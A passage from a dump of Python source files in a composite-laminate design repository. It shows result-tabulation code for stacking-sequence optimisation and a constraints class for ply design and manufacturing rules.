abs(lampam_target[1]-lampam[1])'] \\\r\n = abs(lampam_target[0] - result.lampam[0])\r\n table_result.loc[i, 'error2'] = abs(\r\n lampam_target[1] - result.lampam[1])\r\n table_result.loc[i, 'error3'] = abs(\r\n lampam_target[2]- result.lampam[2])\r\n table_result.loc[i, 'error4'] = abs(\r\n lampam_target[3]- result.lampam[3])\r\n table_result.loc[i, 'error5'] = abs(\r\n lampam_target[4]- result.lampam[4])\r\n table_result.loc[i, 'error6'] = abs(\r\n lampam_target[5]- result.lampam[5])\r\n table_result.loc[i, 'error7'] = abs(\r\n lampam_target[6]- result.lampam[6])\r\n table_result.loc[i, 'error8'] = abs(\r\n lampam_target[7]- result.lampam[7])\r\n table_result.loc[i, 'error9'] = abs(\r\n lampam_target[8]- result.lampam[8])\r\n table_result.loc[i, 'error10'] = abs(\r\n lampam_target[9]- result.lampam[9])\r\n table_result.loc[i, 'error11'] = abs(\r\n lampam_target[10]- result.lampam[10])\r\n table_result.loc[i, 'error12'] = abs(\r\n lampam_target[11]- result.lampam[11])\r\n\r\n # lampam_target\r\n table_result.loc[i, 'lampam_target[1]'] = lampam_target[0]\r\n table_result.loc[i, 'lampam_target[2]'] = lampam_target[1]\r\n table_result.loc[i, 'lampam_target[3]'] = lampam_target[2]\r\n table_result.loc[i, 'lampam_target[4]'] = lampam_target[3]\r\n table_result.loc[i, 'lampam_target[5]'] = lampam_target[4]\r\n table_result.loc[i, 'lampam_target[6]'] = lampam_target[5]\r\n table_result.loc[i, 'lampam_target[7]'] = lampam_target[6]\r\n table_result.loc[i, 'lampam_target[8]'] = lampam_target[7]\r\n table_result.loc[i, 'lampam_target[9]'] = lampam_target[8]\r\n table_result.loc[i, 'lampam_target[10]'] = lampam_target[9]\r\n table_result.loc[i, 'lampam_target[11]'] = lampam_target[10]\r\n table_result.loc[i, 'lampam_target[12]'] = lampam_target[11]\r\n\r\n # Retrieved stacking sequence at step 1\r\n ss_flatten = np.array(result.ss_tab[0], dtype=str)\r\n ss_flatten = ' '.join(ss_flatten)\r\n table_result.loc[i, 'ss retrieved at step 1'] = ss_flatten\r\n\r\n # Retrieved stacking sequence\r\n ss_flatten = np.array(result.ss, dtype=str)\r\n ss_flatten = ' '.join(ss_flatten)\r\n table_result.loc[i, 'ss retrieved'] = ss_flatten\r\n\r\n # Target stacking sequence\r\n ss_flatten = np.array(ss_target, dtype=str)\r\n #ss_flatten = ' '.join(ss_flatten)\r\n table_result.loc[i, 'ss target'] = ss_flatten\r\n\r\n # Ply counts\r\n table_result.loc[i, 'N0_target'] = N0_Target\r\n table_result.loc[i, 'N90_target'] = N90_Target\r\n table_result.loc[i, 'N45_target'] = N45_Target\r\n table_result.loc[i, 'N-45_target'] = N135_Target\r\n N0 = sum(result.ss == 0)\r\n N90 = sum(result.ss == 90)\r\n N45 = sum(result.ss == 45)\r\n N135 = sum(result.ss == -45)\r\n table_result.loc[i, 'N0 - N0_target'] = N0 - N0_Target\r\n table_result.loc[i, 'N90 - N90_target'] = N90 - N90_Target\r\n table_result.loc[i, 'N45 - N45_target'] = N45 - N45_Target\r\n table_result.loc[i, 'N-45 - N-45_target'] = N135 - N135_Target\r\n table_result.loc[i, 'penalty value for the 10% rule'] \\\r\n = calc_penalty_10_ss(result.ss, constraints)\r\n\r\n for ind in range(n_outer_step):\r\n # numbers of stacks at the last level of the last group search\r\n table_result.loc[i, 'n_designs_last_level ' + str(ind + 1)] \\\r\n = result.n_designs_last_level_tab[ind]\r\n # numbers of repaired stacks at the last group search\r\n table_result.loc[i, 'n_designs_repaired ' + str(ind + 1)] \\\r\n = result.n_designs_repaired_tab[ind]\r\n # numbers of unique repaired stacks at the last group search\r\n table_result.loc[i, 'n_designs_repaired_unique ' + str(ind + 1)] \\\r\n = result.n_designs_repaired_unique_tab[ind]\r\n\r\n # in-plane orthotropy\r\n ipo_now = ipo_param_1_12(result.lampam, mat_prop, constraints.sym)\r\n table_result.loc[i, 'In-plane orthotropy parameter 1'] = ipo_now[0]\r\n table_result.loc[i, 'In-plane orthotropy parameter 2'] = ipo_now[1]\r\n table_result.loc[i, 'In-plane orthotropy parameter 3'] = ipo_now[2]\r\n table_result.loc[i, 'In-plane orthotropy parameter 4'] = ipo_now[3]\r\n table_result.loc[i, 'In-plane orthotropy parameter 5'] = ipo_now[4]\r\n table_result.loc[i, 'In-plane orthotropy parameter 6'] = ipo_now[5]\r\n table_result.loc[i, 'In-plane orthotropy parameter 7'] = ipo_now[6]\r\n table_result.loc[i, 'In-plane orthotropy parameter 8'] = ipo_now[7]\r\n table_result.loc[i, 'In-plane orthotropy parameter 9'] = ipo_now[8]\r\n table_result.loc[i, 'In-plane orthotropy parameter 10'] = ipo_now[9]\r\n table_result.loc[i, 'In-plane orthotropy parameter 11'] = ipo_now[10]\r\n table_result.loc[i, 'In-plane orthotropy parameter 12'] = ipo_now[11]\r\n\r\n A = A_from_lampam(result.lampam, mat_prop)\r\n A11 = A[0, 0]\r\n A22 = A[1, 1]\r\n A12 = A[0, 1]\r\n A66 = A[2, 2]\r\n A16 = A[0, 2]\r\n A26 = A[1, 2]\r\n\r\n B = B_from_lampam(result.lampam, mat_prop)\r\n B11 = B[0, 0]\r\n B22 = B[1, 1]\r\n B12 = B[0, 1]\r\n B66 = B[2, 2]\r\n B16 = B[0, 2]\r\n B26 = B[1, 2]\r\n\r\n D = D_from_lampam(result.lampam, mat_prop)\r\n D11 = D[0, 0]\r\n D22 = D[1, 1]\r\n D12 = D[0, 1]\r\n D66 = D[2, 2]\r\n D16 = D[0, 2]\r\n D26 = D[1, 2]\r\n\r\n# print('A16', A16, A16_target, abs((A16 - A16_target)/A16_target))\r\n# print('A26', A26, A26_target, abs((A26 - A26_target)/A26_target))\r\n#\r\n# print('D16', D16, D16_target, abs((D16 - D16_target)/D16_target))\r\n# print('D26', D26, D26_target, abs((D26 - D26_target)/D26_target))\r\n\r\n table_result.loc[i, 'diff A11 percentage'] \\\r\n = abs((A11 - A11_target)/A11_target)\r\n table_result.loc[i, 'diff A22 percentage'] \\\r\n = abs((A22 - A22_target)/A22_target)\r\n\r\n if abs(A12_target/A11_target) > 1e-8:\r\n table_result.loc[i, 'diff A12 percentage'] \\\r\n = abs((A12 - A12_target)/A12_target)\r\n else:\r\n table_result.loc[i, 'diff A12 percentage'] = np.NaN\r\n if abs(A66_target/A11_target) > 1e-8:\r\n table_result.loc[i, 'diff A66 percentage'] \\\r\n = abs((A66 - A66_target)/A66_target)\r\n else:\r\n table_result.loc[i, 'diff A66 percentage'] = np.NaN\r\n if abs(A16_target/A11_target) > 1e-8:\r\n table_result.loc[i, 'diff A16 percentage'] \\\r\n = abs((A16 - A16_target)/A16_target)\r\n else:\r\n table_result.loc[i, 'diff A16 percentage'] = np.NaN\r\n if abs(A26_target/A11_target) > 1e-8:\r\n table_result.loc[i, 'diff A26 percentage'] \\\r\n = abs((A26 - A26_target)/A26_target)\r\n else:\r\n table_result.loc[i, 'diff A26 percentage'] = np.NaN\r\n\r\n if B11_target:\r\n table_result.loc[i, 'diff B11 percentage'] \\\r\n = abs((B11 - B11_target)/B11_target)\r\n else:\r\n table_result.loc[i, 'diff B11 percentage'] = np.NaN\r\n if B22_target:\r\n table_result.loc[i, 'diff B22 percentage'] \\\r\n = abs((B22 - B22_target)/B22_target)\r\n else:\r\n table_result.loc[i, 'diff B22 percentage'] = np.NaN\r\n if B12_target:\r\n table_result.loc[i, 'diff B12 percentage'] \\\r\n = abs((B12 - B12_target)/B12_target)\r\n else:\r\n table_result.loc[i, 'diff B12 percentage'] = np.NaN\r\n if B66_target:\r\n table_result.loc[i, 'diff B66 percentage'] \\\r\n = abs((B66 - B66_target)/B66_target)\r\n else:\r\n table_result.loc[i, 'diff B66 percentage'] = np.NaN\r\n if B16_target:\r\n table_result.loc[i, 'diff B16 percentage'] \\\r\n = abs((B16 - B16_target)/B16_target)\r\n else:\r\n table_result.loc[i, 'diff B16 percentage'] = np.NaN\r\n if B26_target:\r\n table_result.loc[i, 'diff B26 percentage'] \\\r\n = abs((B26 - B26_target)/B26_target)\r\n else:\r\n table_result.loc[i, 'diff B26 percentage'] = np.NaN\r\n\r\n table_result.loc[i, 'diff D11 percentage'] \\\r\n = abs((D11 - D11_target)/D11_target)\r\n table_result.loc[i, 'diff D22 percentage'] \\\r\n = abs((D22 - D22_target)/D22_target)\r\n if abs(D12_target/D11_target) > 1e-8:\r\n table_result.loc[i, 'diff D12 percentage'] \\\r\n = abs((D12 - D12_target)/D12_target)\r\n else:\r\n table_result.loc[i, 'diff D12 percentage'] = np.NaN\r\n if abs(D66_target/D11_target) > 1e-8:\r\n table_result.loc[i, 'diff D66 percentage'] \\\r\n = abs((D66 - D66_target)/D66_target)\r\n else:\r\n table_result.loc[i, 'diff D66 percentage'] = np.NaN\r\n if abs(D16_target/D11_target) > 1e-8:\r\n table_result.loc[i, 'diff D16 percentage'] \\\r\n = abs((D16 - D16_target)/D16_target)\r\n else:\r\n table_result.loc[i, 'diff D16 percentage'] = np.NaN\r\n if abs(D26_target/D11_target) > 1e-8:\r\n table_result.loc[i, 'diff D26 percentage'] \\\r\n = abs((D26 - D26_target)/D26_target)\r\n else:\r\n table_result.loc[i, 'diff D26 percentage'] = np.NaN\r\n\r\n\r\n\r\n# table_result.loc[i, 'diff A11 percentage - approx'] \\\r\n# = abs(4*(lampam_target[0] - result.lampam[0]) \\\r\n# + (lampam_target[1] - result.lampam[1])) \\\r\n# / abs(3 + 4*lampam_target[0] + lampam_target[1])\r\n# table_result.loc[i, 'diff A22 percentage - approx'] \\\r\n# = abs(4*(lampam_target[0] - result.lampam[0]) \\\r\n# - (lampam_target[1] - result.lampam[1])) \\\r\n# / abs(3 - 4*lampam_target[0] + lampam_target[1])\r\n# print(lampam_target[0], lampam_target[1])\r\n# if abs(A12_target/A11_target) > 1e-8:\r\n# table_result.loc[i, 'diff A12 percentage - approx'] \\\r\n# = abs((lampam_target[1] - result.lampam[1])) \\\r\n# / abs(1 - lampam_target[1])\r\n# else:\r\n# table_result.loc[i, 'diff A12 percentage - approx'] = np.NaN\r\n# if abs(A66_target/A11_target) > 1e-8:\r\n# table_result.loc[i, 'diff A66 percentage - approx'] \\\r\n# = abs((lampam_target[1] - result.lampam[1])) \\\r\n# / abs(4 - lampam_target[1])\r\n# else:\r\n# table_result.loc[i, 'diff A66 percentage - approx'] = np.NaN\r\n# if abs(A16_target/A11_target) > 1e-8:\r\n# table_result.loc[i, 'diff A16 percentage - approx'] \\\r\n# = abs(2*(lampam_target[2] - result.lampam[2]) \\\r\n# + (lampam_target[3] - result.lampam[3])) \\\r\n# / abs(2*lampam_target[2] + lampam_target[3])\r\n# else:\r\n# table_result.loc[i, 'diff A16 percentage - approx'] = np.NaN\r\n# if abs(A26_target/A11_target) > 1e-8:\r\n# table_result.loc[i, 'diff A26 percentage - approx'] \\\r\n# = abs(2*(lampam_target[2] - result.lampam[2]) \\\r\n# - (lampam_target[3] - result.lampam[3])) \\\r\n# / abs(2*lampam_target[2] - lampam_target[3])\r\n# else:\r\n# table_result.loc[i, 'diff A26 percentage - approx'] = np.NaN\r\n#\r\n#\r\n#\r\n# table_result.loc[i, 'diff D11 percentage - approx'] \\\r\n# = abs(4*(lampam_target[8] - result.lampam[8]) \\\r\n# + (lampam_target[9] - result.lampam[9])) \\\r\n# / abs(3 + 4*lampam_target[8] + lampam_target[9])\r\n# table_result.loc[i, 'diff D22 percentage - approx'] \\\r\n# = abs(4*(lampam_target[8] - result.lampam[8]) \\\r\n# - (lampam_target[9] - result.lampam[9])) \\\r\n# / abs(3 - 4*lampam_target[8] + lampam_target[9])\r\n# if abs(D12_target/D11_target) > 1e-8:\r\n# table_result.loc[i, 'diff D12 percentage - approx'] \\\r\n# = abs((lampam_target[9] - result.lampam[9])) \\\r\n# / abs(1 - lampam_target[9])\r\n# else:\r\n# table_result.loc[i, 'diff D12 percentage - approx'] = np.NaN\r\n# if abs(D66_target/D11_target) > 1e-8:\r\n# table_result.loc[i, 'diff D66 percentage - approx'] \\\r\n# = abs((lampam_target[9] - result.lampam[9])) \\\r\n# / abs(4 - lampam_target[9])\r\n# else:\r\n# table_result.loc[i, 'diff D66 percentage - approx'] = np.NaN\r\n# if abs(D16_target/D11_target) > 1e-8:\r\n# table_result.loc[i, 'diff D16 percentage - approx'] \\\r\n# = abs(2*(lampam_target[10] - result.lampam[10]) \\\r\n# + (lampam_target[11] - result.lampam[11])) \\\r\n# / abs(2*lampam_target[10] + lampam_target[11])\r\n# else:\r\n# table_result.loc[i, 'diff D16 percentage - approx'] = np.NaN\r\n# if abs(D26_target/D11_target) > 1e-8:\r\n# table_result.loc[i, 'diff D26 percentage - approx'] \\\r\n# = abs(2*(lampam_target[10] - result.lampam[10]) \\\r\n# - (lampam_target[11] - result.lampam[11])) \\\r\n# / abs(2*lampam_target[10] - lampam_target[11])\r\n# else:\r\n# table_result.loc[i, 'diff D26 percentage - approx'] = np.NaN\r\n\r\n\r\n### Write results in a excell sheet\r\nwriter = pd.ExcelWriter(result_filename)\r\ntable_result.to_excel(writer, 'results')\r\nwriter.save()\r\nsave_constraints_LAYLA(result_filename, constraints)\r\nsave_parameters_LAYLA_V02(result_filename, parameters)\r\nsave_materials(result_filename, mat_prop)\r\nautofit_column_widths(result_filename)\r\n"
},
{
"alpha_fraction": 0.5440820455551147,
"alphanum_fraction": 0.5852829217910767,
"avg_line_length": 40.5343132019043,
"blob_id": "f9bd65bb82b1e76359a3b39459cb00484c371121",
"content_id": "105967850ba3dcca5b2e21d5e7984c88456452bc",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 17354,
"license_type": "permissive",
"max_line_length": 105,
"num_lines": 408,
"path": "/src/BELLA/constraints.py",
"repo_name": "noemiefedon/BELLA",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\r\n\"\"\"\r\nClass for design and manufacturing constraints\r\n\"\"\"\r\n__version__ = '2.0'\r\n__author__ = 'Noemie Fedon'\r\n\r\n\r\nimport numpy as np\r\n\r\nclass Constraints():\r\n \"A class for storing a set of design & manufacturing constraints\"\r\n\r\n\r\n def __init__(\r\n self,\r\n sym=False,\r\n bal=False,\r\n oopo=False,\r\n dam_tol=False,\r\n rule_10_percent=False,\r\n rule_10_Abdalla=False,\r\n percent_Abdalla=0,\r\n combine_45_135=True,\r\n calc_combine_45_135=True,\r\n percent_0=0,\r\n percent_45=0,\r\n percent_90=0,\r\n percent_135=0,\r\n percent_45_135=0,\r\n diso=False,\r\n contig=False,\r\n n_contig=1,\r\n delta_angle=45,\r\n dam_tol_rule=2,\r\n set_of_angles=np.array([0, 45, 90, -45]),\r\n min_drop=1,\r\n pdl_spacing=False,\r\n covering=False,\r\n n_covering=0):\r\n \" creates a set of constraints\"\r\n\r\n # Symmetry\r\n self.sym = sym\r\n if not isinstance(sym, bool):\r\n raise ConstraintDefinitionError(\"\"\"\r\nAttention, sym must be a boolean!\"\"\")\r\n\r\n # Damage tolerance\r\n self.dam_tol = dam_tol\r\n if not isinstance(dam_tol, bool):\r\n raise ConstraintDefinitionError(\"\"\"\r\nAttention, dam_tol must be a boolean!\"\"\")\r\n # which damage tolerance rule?\r\n if dam_tol:\r\n if dam_tol_rule not in [1, 2, 3]:\r\n raise ConstraintDefinitionError(\"\"\"\r\nChoose either:\r\n - damage tolerance rule 1: one outer ply at + or -45 deg at the laminate\r\n surfaces (2 plies in total)\r\n - damage tolerance rule 2: two [+45, -45] or [-45, +45] at the laminate\r\n surfaces (4 plies in total)\r\n - damage tolerance rule 3: [+45,-45] [-45,+45] [+45,+45] or [-45,-45] at\r\n the laminate surfaces (4 plies in total)\"\"\")\r\n self.dam_tol_rule = dam_tol_rule\r\n else:\r\n self.dam_tol_rule = 0\r\n\r\n # Covering guideline\r\n # covering: the outermost plies should not be dropped\r\n # n_covering: number of outer plies on each laminate surface that\r\n # should not be dropped\r\n if not isinstance(covering, bool):\r\n raise ConstraintDefinitionError(\"\"\"\r\nAttention, covering must be a boolean!\"\"\")\r\n if n_covering not in [0, 1, 2]:\r\n raise ConstraintDefinitionError(\"\"\"\r\nChoose either n_covering = 0, 1 or 2\"\"\")\r\n # The damage tolerance rule activates the covering rule\r\n if dam_tol:\r\n covering = True\r\n if dam_tol_rule == 1:\r\n n_covering = max(n_covering, 1)\r\n else:\r\n n_covering = 2\r\n self.covering = covering\r\n if covering:\r\n n_covering = max(n_covering, 1)\r\n self.n_covering = n_covering\r\n\r\n # 10% rule\r\n self.rule_10_percent = rule_10_percent\r\n if not isinstance(rule_10_percent, bool):\r\n raise ConstraintDefinitionError(\"\"\"\r\nAttention, rule_10_percent must be a boolean!\"\"\")\r\n # restrictions of LPs (otherwise restrictions of ply percentages in the\r\n # 0/+-45/90 deg directions)\r\n self.rule_10_Abdalla = rule_10_Abdalla\r\n if not isinstance(rule_10_Abdalla, bool):\r\n raise ConstraintDefinitionError(\"\"\"\r\nAttention, rule_10_Abdalla must be a boolean!\"\"\")\r\n # set the limit percentages for the 10% rule\r\n self.set_percentages(\r\n percent_0, percent_45, percent_90, percent_135, percent_45_135,\r\n percent_Abdalla, combine_45_135, calc_combine_45_135)\r\n\r\n # Disorientation rule: the change of angles between two consecutive\r\n # plies should not exceed delta_angle\r\n self.diso = diso\r\n if not isinstance(diso, bool):\r\n raise ConstraintDefinitionError(\"\"\"\r\nAttention, diso must be a boolean!\"\"\")\r\n if diso:\r\n self.delta_angle = delta_angle\r\n else:\r\n self.delta_angle = 180\r\n\r\n # Contiguity rule: no more that 'n_contig' plies with same fibre\r\n # orientation should be next to each other\r\n self.contig = contig\r\n if not isinstance(contig, bool):\r\n raise ConstraintDefinitionError(\"\"\"\r\nAttention, contig must be a boolean!\"\"\")\r\n if not contig:\r\n self.n_contig = 1\r\n self.n_contig_c = 1e10\r\n else:\r\n self.n_contig = n_contig\r\n self.n_contig_c = n_contig\r\n if n_contig == 1:\r\n raise ConstraintDefinitionError(\"\"\"\r\nNot allowing two adjacent plies to have the same fibre orientation is too\r\nrestricting!\r\n\"\"\")\r\n\r\n # Set the fibre orientations\r\n self.set_fibre_orientations(set_of_angles, rule_10_percent)\r\n\r\n # pdlspacing to activate the ply drop spacing rule\r\n if not isinstance(pdl_spacing, bool):\r\n raise ConstraintDefinitionError(f\"\"\"\r\nAttention, pdl_spacing {pdl_spacing} must be a boolean!\"\"\")\r\n self.pdl_spacing = pdl_spacing\r\n\r\n\r\n # Minimum number of continuous plies required between two\r\n # blocks of dropped plies\r\n if not isinstance(min_drop, int):\r\n raise ConstraintDefinitionError(\"\"\"\r\nAttention,the minimum number of plies between two block of dropped plies\r\nmust be an integer!\"\"\")\r\n if min_drop < 1:\r\n raise ConstraintDefinitionError(\"\"\"\r\nAttention,the minimum number of plies between two block of dropped plies\r\nmust be greater than 0!\"\"\")\r\n self.min_drop = min_drop\r\n\r\n # balance and orthrotropy requirements\r\n if not isinstance(oopo, bool):\r\n raise ConstraintDefinitionError(f\"\"\"\r\nAttention, out-of-plane orthotropy requirements {oopo} must be a boolean!\"\"\")\r\n if not isinstance(bal, bool):\r\n raise ConstraintDefinitionError(f\"\"\"\r\nAttention, the balance requirement {bal} must be a boolean!\"\"\")\r\n self.oopo = oopo # Out-of-plane orthotropy requirement\r\n self.bal = bal # Balance requirements\r\n self.ipo = self.bal # Balance requirements (to use RELAY)\r\n\r\n def set_percentages(\r\n self, percent_0, percent_45, percent_90, percent_135, percent_45_135,\r\n percent_Abdalla, combine_45_135, calc_combine_45_135):\r\n 'sets the percentages for the 10% rule'\r\n\r\n # determine if 10% rule applied on +-45 plies simultaneously or not\r\n if calc_combine_45_135:\r\n if percent_45 > 1e-15 + percent_45_135 / 2 \\\r\n or percent_135 > 1e-15 + percent_45_135 / 2:\r\n combine_45_135 = False\r\n else:\r\n combine_45_135 = True\r\n\r\n # Minimum percentage for 10% rule of Abdalla (restrictions of LPs)\r\n self.percent_Abdalla = percent_Abdalla\r\n # Minimum percentage of 0deg plies\r\n self.percent_0 = percent_0\r\n # Minimum percentage of 90deg plies\r\n self.percent_90 = percent_90\r\n if combine_45_135:\r\n # Minimum percentage of +-45deg plies\r\n self.percent_45_135 = percent_45_135\r\n # Minimum percentage of 45deg plies\r\n self.percent_45 = 0\r\n # Minimum percentage of -45deg plies\r\n self.percent_135 = 0\r\n else:\r\n # Minimum percentage of +-45deg plies\r\n self.percent_45_135 = 0\r\n # Minimum percentage of 45deg plies\r\n self.percent_45 = percent_45\r\n # Minimum percentage of -45deg plies\r\n self.percent_135 = percent_135\r\n\r\n if not isinstance(percent_Abdalla, (float, int)):\r\n raise ConstraintDefinitionError(\"\"\"\r\nAttention, percent_Abdalla must be a number (float or integer)!\"\"\")\r\n if percent_Abdalla < 0 or percent_Abdalla > 24.9999999:\r\n raise ConstraintDefinitionError(\"\"\"\r\nAttention, percent_Abdalla is a pecentage and must between 0 and 25!\"\"\")\r\n if not isinstance(percent_0, (float, int)):\r\n raise ConstraintDefinitionError(\"\"\"\r\nAttention, percent_0 must be a number (float or integer)!\"\"\")\r\n if percent_0 < 0 or percent_0 > 100:\r\n raise ConstraintDefinitionError(\"\"\"\r\nAttention, percent_0 is a pecentage and must between 0 and 100!\"\"\")\r\n if not isinstance(percent_45, (float, int)):\r\n raise ConstraintDefinitionError(\"\"\"\r\nAttention, percent_45 must be a number (float or integer)!\"\"\")\r\n if percent_45 < 0 or percent_45 > 100:\r\n raise ConstraintDefinitionError(\"\"\"\r\nAttention, percent_45 is a pecentage and must between 0 and 100!\"\"\")\r\n if not isinstance(percent_90, (float, int)):\r\n raise ConstraintDefinitionError(\"\"\"\r\nAttention, percent_90 must be a number (float or integer)!\"\"\")\r\n if percent_90 < 0 or percent_90 > 100:\r\n raise ConstraintDefinitionError(\"\"\"\r\nAttention, percent_90 is a pecentage and must between 0 and 100!\"\"\")\r\n if not isinstance(percent_135, (float, int)):\r\n raise ConstraintDefinitionError(\"\"\"\r\nAttention, percent_135 must be a number (float or integer)!\"\"\")\r\n if percent_135 < 0 or percent_135 > 100:\r\n raise ConstraintDefinitionError(\"\"\"\r\nAttention, percent_135 is a pecentage and must between 0 and 100!\"\"\")\r\n if not isinstance(percent_45_135, (float, int)):\r\n raise ConstraintDefinitionError(\"\"\"\r\nAttention, percent_45_135 must be a number (float or integer)!\"\"\")\r\n if percent_45_135 < 0 or percent_45_135 > 100:\r\n raise ConstraintDefinitionError(\"\"\"\r\nAttention, percent_45_135 is a pecentage and must between 0 and 100!\"\"\")\r\n if percent_0 + percent_45 + percent_90 + percent_135 > 100 \\\r\n or percent_0 + percent_90 + percent_45_135 > 100:\r\n print(\"\"\"\r\nTotal percentage for the plies in the directions 0/+-45/90 greater than 100!\r\n\"\"\")\r\n if self.rule_10_percent:\r\n if self.rule_10_Abdalla:\r\n self.percent_Abdalla = self.percent_Abdalla/100\r\n self.percent_0 = 0\r\n self.percent_45 = 0\r\n self.percent_90 = 0\r\n self.percent_135 = 0\r\n self.percent_45_135 = 0\r\n self.percent_tot = 0\r\n else:\r\n self.percent_Abdalla = 0\r\n self.percent_0 = self.percent_0/100\r\n self.percent_45 = self.percent_45/100\r\n self.percent_90 = self.percent_90/100\r\n self.percent_135 = self.percent_135/100\r\n self.percent_45_135 = self.percent_45_135/100\r\n self.percent_tot = max(\r\n self.percent_0 + self.percent_45 \\\r\n + self.percent_90 + self.percent_135,\r\n self.percent_0 + self.percent_45_135 + self.percent_90)\r\n else:\r\n self.percent_Abdalla = 0\r\n self.percent_0 = 0\r\n self.percent_45 = 0\r\n self.percent_90 = 0\r\n self.percent_135 = 0\r\n self.percent_45_135 = 0\r\n self.percent_tot = 0\r\n\r\n def set_fibre_orientations(self, set_of_angles, rule_10_percent):\r\n 'sets the aloowed fibre orientations'\r\n # Allowed fibre orientations\r\n self.set_of_angles = np.unique(set_of_angles)\r\n if (self.set_of_angles > 90).any() \\\r\n or (self.set_of_angles <= -90).any():\r\n raise Exception(r\"\"\"\r\nThe allowed fibre angles must be between -90 (excluded) and 90 degrees\r\n(included).\"\"\")\r\n sett = set(self.set_of_angles)\r\n if (0 not in sett or 45 not in sett or 90 not in sett \\\r\n or -45 not in sett) and rule_10_percent:\r\n raise Exception(r\"\"\"\r\nThe 10% rule is only applicable if the fibre orientations 0, +45, 90, -90\r\nare allowed.\"\"\")\r\n # usefull data for the 10% rule application\r\n if 0 in sett:\r\n # index of the 0deg fibre direction in set_of_angles\r\n self.index0 = np.where(self.set_of_angles == 0)[0][0]\r\n if 45 in sett:\r\n # index of the 45deg fibre direction in set_of_angles\r\n self.index45 = np.where(self.set_of_angles == 45)[0][0]\r\n if 90 in sett:\r\n # index of the 90deg fibre direction in set_of_angles\r\n self.index90 = np.where(self.set_of_angles == 90)[0][0]\r\n if -45 in sett:\r\n # index of the -45deg fibre direction in set_of_angles\r\n self.index135 = np.where(self.set_of_angles == -45)[0][0]\r\n\r\n # usefull data for counting plies in each fibre direction\r\n angles_dict = dict() # Dictionary to retrieve angles\r\n ind_angles_dict = dict() # Dictionary to retrieve indices\r\n for index, angle in enumerate(self.set_of_angles):\r\n angles_dict[index] = angle\r\n ind_angles_dict[angle] = index\r\n if 90 in sett:\r\n ind_angles_dict[-90] = ind_angles_dict[90]\r\n self.angles_dict = angles_dict\r\n self.ind_angles_dict = ind_angles_dict\r\n\r\n # usefull data for positive angles only\r\n pos_angles = np.unique(np.abs(self.set_of_angles))\r\n indices_pos_angles_dict = dict() # Dictionary to retrieve indices\r\n for index, angle in enumerate(pos_angles):\r\n# pos_angles_dict[index] = angle\r\n indices_pos_angles_dict[angle] = index\r\n self.pos_angles = pos_angles\r\n self.indices_pos_angles_dict = indices_pos_angles_dict\r\n\r\n # check that angled plies all have their balanced counterpart\r\n for angle in self.set_of_angles:\r\n if angle != 90 and -angle not in self.set_of_angles:\r\n raise Exception(f\"\"\"\r\nMissing input fibre orientation {-angle} to have both angle plies +-{angle}.\r\n\"\"\")\r\n # Identification of the panels which are not balanced by counting the\r\n # difference of ply counts for the angled plies.\r\n angles_bal = self.set_of_angles[[\r\n index for index in range(self.set_of_angles.size) \\\r\n if self.set_of_angles[index] > 0 \\\r\n and self.set_of_angles[index] < 90]]\r\n # angles_bal: each row has three values:\r\n # - fibre orientation of angle ply theta\r\n # - index of +theta in constraints.set_of_angles\r\n # - index of -theta in constraints.set_of_angles\r\n self.angles_bal = np.array([[\r\n elem,\r\n self.ind_angles_dict[elem],\r\n self.ind_angles_dict[-elem]\r\n ] for elem in angles_bal])\r\n\r\n # data used for repair for balance\r\n self.indices_bal = dict() # Dictionary to retrieve indices\r\n for index, angle in enumerate(self.angles_bal[:, 0]):\r\n self.indices_bal[angle] = index\r\n\r\n # number of allowed fibre orientations\r\n self.n_set_of_angles = len(set(set_of_angles))\r\n if self.n_set_of_angles != len((set_of_angles)):\r\n raise Exception(\"\"\"\r\nRepeated angles in the set of allowed fibre orientations set_of_angles\"\"\")\r\n\r\n # usefull data to implement the 10% rule\r\n self.angles_10 = [0, 90, 45, -45]\r\n # dictionary to retrieve indices related to the 10% rule\r\n self.indices_10 = dict()\r\n for index, angle in enumerate(self.angles_10):\r\n self.indices_10[angle] = index\r\n\r\n # usefull data to avoid repetitive caluclations of cosines and sines\r\n self.cos_sin = np.empty((self.n_set_of_angles, 4), float)\r\n for ind_angle, angle in enumerate(self.set_of_angles):\r\n self.cos_sin[ind_angle, :] = np.hstack((\r\n np.cos(np.deg2rad(2*float(angle))),\r\n np.cos(np.deg2rad(4*float(angle))),\r\n np.sin(np.deg2rad(2*float(angle))),\r\n np.sin(np.deg2rad(4*float(angle)))))\r\n\r\n\r\n def __repr__(self):\r\n \" Display object \"\r\n return f\"\"\"\r\nConstraints\r\n Symmetry : {self.sym}\r\n Balance requirement : {self.bal}\r\n Out-of-plane orthotropy requirement : {self.oopo}\r\n Damage tolerance constraint : {self.dam_tol}\r\n Damage tolerance rule : {self.dam_tol_rule}\r\n Covering : {self.covering}\r\n Number of plies for covering rule : {self.n_covering}\r\n 10 percent rule : {self.rule_10_percent}\r\n rule applied by restricting LPs : {self.rule_10_percent and self.rule_10_Abdalla}\r\n rule applied by restricting ply percentages : {self.rule_10_percent and not self.rule_10_Abdalla}\r\n percentage limit for the rule applied on LPs : {self.percent_Abdalla*100:.2f} %\r\n percentage 0 : {self.percent_0*100:.2f} %\r\n percentage 45 : {self.percent_45*100:.2f} %\r\n percentage 90 : {self.percent_90*100:.2f} %\r\n percentage -45 : {self.percent_135*100:.2f} %\r\n percentage +-45 : {self.percent_45_135*100:.2f} %\r\n Disorientation rule : {self.diso}\r\n delta_angle : {self.delta_angle}\r\n Contiguity rule : {self.contig}\r\n n_contig : {self.n_contig}\r\n Set of angles : {self.set_of_angles}\r\n Number of allowed fibre orientations: {self.n_set_of_angles}\r\n Ply drop spacing rule: {self.pdl_spacing}\r\n Minimum number of plies between ply drops region: {self.min_drop}\r\n\"\"\"\r\n\r\nclass ConstraintDefinitionError(Exception):\r\n \" Errors during the constraints definition\"\r\n\r\n\r\nif __name__ == \"__main__\":\r\n constraints = Constraints(set_of_angles=[0, 45, -30, -45, 30, 60, -60, 90])\r\n print(constraints)\r\n"
},
{
"alpha_fraction": 0.4753764271736145,
"alphanum_fraction": 0.5827280879020691,
"avg_line_length": 37.20833206176758,
"blob_id": "942bc423ec34ba89fce7d3a780f626d910015fbd",
"content_id": "aae1013f71471a7d51d046d44cee92904592290c",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 11290,
"license_type": "permissive",
"max_line_length": 84,
"num_lines": 288,
"path": "/src/buckling/buckling.py",
